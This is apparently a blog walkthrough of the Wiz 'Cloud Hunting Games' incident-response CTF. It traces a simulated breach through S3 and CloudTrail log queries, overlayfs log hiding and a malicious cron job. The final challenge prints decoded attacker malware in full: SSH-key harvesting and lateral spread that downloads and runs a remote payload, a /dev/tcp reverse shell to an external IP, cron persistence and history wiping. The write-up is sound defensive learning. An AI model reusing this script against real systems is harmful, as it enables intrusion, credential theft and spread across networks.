Cloud Hunting Games

Jun 13, 2025 | Cybersecurity

Background

Once a month my department has a “brain day”. This is a day where employees are supposed to step away from normal work and use the time to learn something new, study for an upcoming certification, or finally tackle that long list of technical blog posts that we have been meaning to check out…

In late April, Wiz started teasing a new CTF challenge they were cooking up. In early May, they formally announced it via this blog post: https://www.wiz.io/blog/the-cloud-hunting-games-ctf-challenge. Since this one covers IR and cloud, and the last CTF I did from Wiz (https://eksclustergames.com/, I will eventually write a blog post about that one) was a blast, I was excited to dive into this one. Before starting the challenges, you are shown an email from “FizzShadows” noting that they have your company’s data and you must pay them bitcoin in order for them to not disclose it.

CTF Name: Cloud Hunting Games

URL: https://www.cloudhuntinggames.com/

Username: volmeringd

# of Challenges: 5

Challenge 1:

The first challenge starts by giving you a small blurb about how your company’s secret recipes are stored in S3 and noting your company has S3 data event logging enabled. It also gives you a text editor of sorts where you can run SQL queries. The data you are querying against is the S3 access logs. Note, if SQL queries aren’t your jam, you can run the default query to get all results, click on the “columns” button, and at the bottom there is a “Download as CSV” button. It has been a minute since I did SQL, so I figured I would use this as a chance to brush off the dust a bit (and also leverage my good old friend Copilot).

So based off the description, we are assuming the bad actor obtained files (typically a GetObject event in AWS) and it is a recipe of some sort… So I tried a quick and dirty query like this:

SELECT * FROM s3_data_events WHERE EventName LIKE 'GetObject' AND Path LIKE '%recipe%'

If you pay attention to the user agents, one of them is not like the others. Most of the user agents are browsers; one is the boto3 client. Additionally, if you look at the ARNs, one of them doesn’t follow the same naming pattern as the rest. This led me to one IAM role: S3Reader/drinks
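If you go the CSV route instead, a quick shell pivot on the user-agent column surfaces the outlier fast. A minimal sketch, assuming a hypothetical export layout (the column names and rows below are made up for illustration, not the actual CTF data):

```shell
# Hypothetical CSV export -- column layout and values are assumptions, not real CTF data
cat > events.csv <<'EOF'
eventName,userAgent,userIdentityArn
GetObject,Mozilla/5.0,arn:aws:iam::123456789012:user/alice
GetObject,Mozilla/5.0,arn:aws:iam::123456789012:user/bob
GetObject,Boto3/1.34.100,arn:aws:sts::123456789012:assumed-role/S3Reader/drinks
EOF

# Count events per user agent; a scripted client stands out fast against the browsers
awk -F',' 'NR>1 {print $2}' events.csv | sort | uniq -c | sort -rn
```

The same sort/uniq trick works on any column you want to stack-rank (ARNs, source IPs, event names).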

Challenge 2:

In this challenge, they want you to go a step deeper and figure out which IAM user assumed the S3Reader/drinks role. Since we know we want an “AssumeRole” event, and the request parameters include the role being assumed (we want one that includes drinks), we can do this:

SELECT * FROM cloudtrail WHERE EventName LIKE 'AssumeRole' AND requestParameters LIKE '%drinks%'

We find out that Moe.Jito is the user that assumed into the role.

Challenge 3:

With this challenge, they want to know what machine the user compromised and used for lateral movement. This one took me some time, and I went down a number of paths. I first started with seeing what else Moe did… He assumed into another session posing as Jack Becker. I then looked at Jack’s activity, but that didn’t yield much. I then decided to go a more brute-force route… I got a count of all event names:

SELECT EventName, COUNT(*) AS event_count
FROM cloudtrail
GROUP BY EventName
ORDER BY event_count DESC;

From there, I started going through the event names to see which ones stood out as potential lateral movement. AssumeRole and UpdateFunctionCode20150331v2 stood out to me. Looking through the AssumeRole events, nothing caught my eye in terms of things to further investigate. UpdateFunctionCode20150331v2 was interesting to me because I have read quite a few reports of Lambda being a vector for persistence and/or lateral movement. Looking at that event in particular:

SELECT * FROM cloudtrail WHERE EventName LIKE 'UpdateFunctionCode20150331v2'

We see that in the “responseElements” column, the Lambda being updated is called “credsrotator”… Sounds like lateral movement if I have ever heard it.

The machine id is located in the userIdentity_ARN field: arn:aws:sts::509843726190:assumed-role/lambdaWorker/i-0a44002eec2f16c25
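The instance id is just the last path component of that assumed-role ARN, so if you want it on its own, awk can peel it off:

```shell
# The session name on an assumed-role ARN is the final '/'-separated field
arn='arn:aws:sts::509843726190:assumed-role/lambdaWorker/i-0a44002eec2f16c25'
echo "$arn" | awk -F'/' '{print $NF}'   # prints i-0a44002eec2f16c25
```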

Challenge 4:

We now move from SQL queries to an actual box. I was elated until I figured out how limited the box’s functionality actually was. We are asked to find the IP of the workload that was the initial entry point into the org. Trying to run normal network-related checks kept resulting in “XX: command not found”. So then I figured I would look at /var/log… Well, /var/log appears to be empty, except for a hidden file:

root@ssh-fetcher:/var/log# cat .gK8du9
FizzShadows were here…

Checking the currently running processes, I see a “healthcheck” program running:

root@ssh-fetcher:~# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   4624  3584 ?        SN   16:52   0:00 bash
root           2  0.0  0.0   1148   640 ?        SN   16:52   0:00 /usr/local/bin/healthcheck -log /var/
root         199  0.0  0.0   7060  2944 ?        RN+  16:54   0:00 ps aux

So I figured I would call it and see what happens:

root@ssh-fetcher:~# healthcheck
Usage: healthcheck -log /var/log/yourlogfile.log

For funsies:

root@ssh-fetcher:~# healthcheck -log /var/log/.gK8du9
Failed to open log file: Read-only file system

Well… That doesn’t seem ideal.

Running the mount command, I can see there are multiple overlay filesystems mounted… one of which is /var/log:

root@ssh-fetcher:~# mount | grep overlay | grep /var/log
overlay on /var/log type overlay (rw,relatime,lowerdir=/var/lib/ <snipped>

We can unmount that with:

umount /var/log

which then lets us see the files in /var/log:
root@ssh-fetcher:~# ls -la /var/log/
total 1784
drwxr-xr-x 4 root root    4096 Jun 13 17:06 .
drwxr-xr-x 1 root root    4096 Feb  1  1990 ..
-rw-r--r-- 1 root root      94 Jun 13 17:07 .gK8du9
drwxr-xr-x 2 root root    4096 Feb  1  1990 apt
drwxr-x--- 2 root root    4096 Feb  1  1990 audit
-rw-r--r-- 1 root root 1490798 Feb  1  1990 auth.log
-rw-rw---- 1 root root       0 Feb  1  1990 btmp
-rw-r--r-- 1 root root    3232 Feb  1  1990 faillog
-rw-r--r-- 1 root root   16009 Jun 13 19:13 health.log
-rw-r--r-- 1 root root  292584 Feb  1  1990 lastlog
-rw-rw-r-- 1 root root       0 Feb  1  1990 wtmp
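As an alternative to unmounting, you can pull the lowerdir path out of the mount output and inspect the hidden lower layer directly. A sketch against a made-up mount line (the real lowerdir was snipped above, so the path here is a placeholder):

```shell
# Placeholder mount line -- the actual lowerdir path was snipped in the output above
line='overlay on /var/log type overlay (rw,relatime,lowerdir=/var/lib/overlay/lower,upperdir=/var/lib/overlay/upper,workdir=/var/lib/overlay/work)'

# Extract the lowerdir= option; on a live box you could then `ls` that directory
echo "$line" | grep -o 'lowerdir=[^,)]*'
```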

The auth log should have details about authentication-related activity. Catting that file and grepping for unique IP addresses yields a single IP:

root@ssh-fetcher:~# cat /var/log/auth.log | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq -c
   5994 102.54.197.238
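Worth noting, that regex is loose (it would happily match octets above 255), but for eyeballing a log it does the job. You can sanity-check it against made-up auth.log-style lines:

```shell
# Made-up auth.log-style lines, just to exercise the IP-extraction pipeline
printf '%s\n' \
  'Failed password for root from 102.54.197.238 port 41234 ssh2' \
  'Accepted publickey for admin from 102.54.197.238 port 41235 ssh2' \
  | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq -c
```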

Challenge 5:

For the last challenge, you are tasked with deleting the secret recipe off the attacker’s server. The blurb notes the attacker is “persistent”, but that went right over my head. I poked around the box for a while but ended up getting stuck. I used 2 points to get a hint and quickly became a sad panda because I realized I didn’t even think to check cron-related things… The hint pointed me to crontabs. Checking for crontab files yields one file:

root@postgresql-service:~# ls -la /var/spool/cron/crontabs/
total 12
drwx-wx--T 1 root root 4096 Feb  1  1990 .
drwxr-xr-x 1 root root 4096 Feb  1  1990 ..
-rw-r--r-- 1 root root  168 Feb  1  1990 postgres

Catting that file, we are directed to another file, /var/lib/postgresql/data/pg_sched:

root@postgresql-service:~# cat /var/spool/cron/crontabs/postgres
# (- installed on Wed Apr  13 08:45:35 2025)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 * * * bash /var/lib/postgresql/data/pg_sched

Catting that file, we get a lovely, giant base64-encoded string. Decoding the string gives us the following code:

#!/bin/bash
# List of interesting policies
VULNERABLE_POLICIES=("AdministratorAccess" "PowerUserAccess" "AmazonS3FullAccess" "IAMFullAccess" "AWSLambdaFullAccess" "AWSLambda_FullAccess")
SERVER="34.118.239.100"
PORT=4444
USERNAME="FizzShadows_1"
PASSWORD="Gx27pQwz92Rk"
CREDENTIALS_FILE="/tmp/c"
SCRIPT_PATH="$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd)/$(basename "${BASH_SOURCE[0]}")"
# Check if a command exists
check_command() {
    if ! command -v $1 &> /dev/null; then
        install_dependency $1
    fi
}
# Install missing dependencies
install_dependency() {
    local package=$1
    if [[ $package == "curl" ]]; then
        apt-get install curl -y &> /dev/null
        yum install curl -y &> /dev/null
    elif [[ $package == "unzip" ]]; then
        apt-get install unzip -y &> /dev/null
        yum install unzip -y &> /dev/null
    elif [[ $package == "aws" ]]; then
        install_aws_cli
    fi
}
# Install AWS CLI locally
install_aws_cli() {
    mkdir -p "$HOME/.aws-cli"
    curl -s "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "$HOME/.aws-cli/awscliv2.zip"
    unzip -q "$HOME/.aws-cli/awscliv2.zip" -d "$HOME/.aws-cli/"
    "$HOME/.aws-cli/aws/install" --install-dir "$HOME/.aws-cli/bin" --bin-dir "$HOME/.aws-cli/bin"
    # Add AWS CLI to PATH
    export PATH=$HOME/.aws-cli/bin:$PATH
    echo 'export PATH="$HOME/.aws-cli/bin:$PATH"' >> "$HOME/.bashrc"
}
# Try to spread
spread_ssh() {
    find_and_execute() {
        local KEYS=$(find ~/ /root /home -maxdepth 5 -name 'id_rsa*' | grep -vw pub;
                     grep IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}';
                     find ~/ /root /home -maxdepth 5 -name '*.pem' | sort -u)
        local HOSTS=$(grep HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk '{print $2}';
                      grep -E "(ssh|scp)" ~/.bash_history /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b";
                      grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b" ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null |
                      grep -vw 127.0.0.1 | sort -u)
        local USERS=$(echo "root";
                      find ~/ /root /home -maxdepth 2 -name '.ssh' | xargs -I {} find {} -name 'id_rsa' | awk -F'/' '{print $3}' | grep -v ".ssh" | sort -u)
        for key in $KEYS; do
            chmod 400 $key
            for user in $USERS; do
                echo $user
                for host in $HOSTS; do
                    ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -u $USERNAME:$PASSWORD -o /dev/shm/controller http://$SERVER/files/controller && bash /dev/shm/controller)"
                done
            done
        done
    }
    find_and_execute
}
create_persistence() {
    (crontab -l 2>/dev/null; echo "0 0 * * * bash $SCRIPT_PATH") | crontab -
}
create_shell () {
    echo "Creating a reverse shell"
    /bin/bash -i >& /dev/tcp/"$SERVER"/"$PORT" 0>&1
}
# Check role policies
check_role_vuln() {
    local ROLE_NAME=$(aws sts get-caller-identity --query "Arn" --output text | awk -F'/' '{print $2}')
    # List attached policies for the given role
    attached_policies=$(aws iam list-attached-role-policies --role-name $ROLE_NAME --query 'AttachedPolicies[*].PolicyName' --output text)
    # Check if the user has IAM permissions to list policies
    if [[ $? -eq 0 ]]; then
        # If the user has IAM permissions, check attached policies
        attached_policies_array=($attached_policies)
        for policy in "${attached_policies_array[@]}"; do
            for vuln_policy in "${VULNERABLE_POLICIES[@]}"; do
                if [[ $policy == $vuln_policy ]]; then
                    return 0
                fi
            done
        done
    else
        aws s3 ls
        if [[ $? -eq 0 ]]; then
            return 0
        else
            aws lambda list-functions
            if [[ $? -eq 0 ]]; then
                return 0
            else
                return 1
            fi
        fi
    fi
}
# Check required dependencies
check_command "curl"
check_command "unzip"
check_command "aws"
check_role_vuln
if [[ $? -eq 0 ]]; then
    create_shell
else
    create_persistence
    spread_ssh
    cat /dev/null > ~/.bash_history
fi
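As an aside, the decode step itself is a one-liner; here with a short sample string rather than the actual pg_sched payload:

```shell
# Sample base64 string (not the real payload) -- decodes to the script's shebang line
echo 'IyEvYmluL2Jhc2gK' | base64 -d   # prints #!/bin/bash
```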

Reading through the code, we have credentials and an IP at the top, and some type of web server on that IP with a /files path.

Putting that information together:

root@postgresql-service:~# curl -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files/controller
File download functionality is currently under maintenance. Please try again later.

Let’s try one layer higher:

root@postgresql-service:~# curl -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files          
Size       Date Modified         Name
--------------------------------------------------
  4.0KB  Feb 15 16:01  Root Beer.txt
  5.0KB  Feb 15 14:01  Man-in-the-Mojito.txt
  3.5KB  Feb 15 15:01  ExfilCola-Top-Secret.txt
  4.5KB  Feb 15 17:01  Prigat Overflow.txt
 10.0KB  Feb 15 18:01  controller
  2.4MB  Feb 19 14:01  Q3_2023_Financial_Report.pdf
  1.2MB  Mar 01 14:01  2024_budget_planning.xlsx
960.0KB  Feb 16 14:01  employee_directory.xlsx
  1.5MB  Mar 06 14:01  taste_test_results_oct2023.xlsx
  3.5MB  Mar 11 14:01  bottling_line_specs_v2.pdf

Bingo! Now, let’s try to delete the “ExfilCola-Top-Secret.txt” file:

root@postgresql-service:~# curl -X DELETE -u FizzShadows_1:Gx27pQwz92Rk http://34.118.239.100/files/ExfilCola-Top-Secret.txt
Success! You’ve deleted the secret recipe before it could be exposed. The flag is: {I know it when I see it}

Wrap Up

This was another wonderful CTF hosted by Wiz. It incorporated elements of cloud IR as well as host IR tasks. The overlayfs trick was a new one for me as a mechanism to cover tracks. If you have some time, I would encourage you to tackle this CTF yourself!
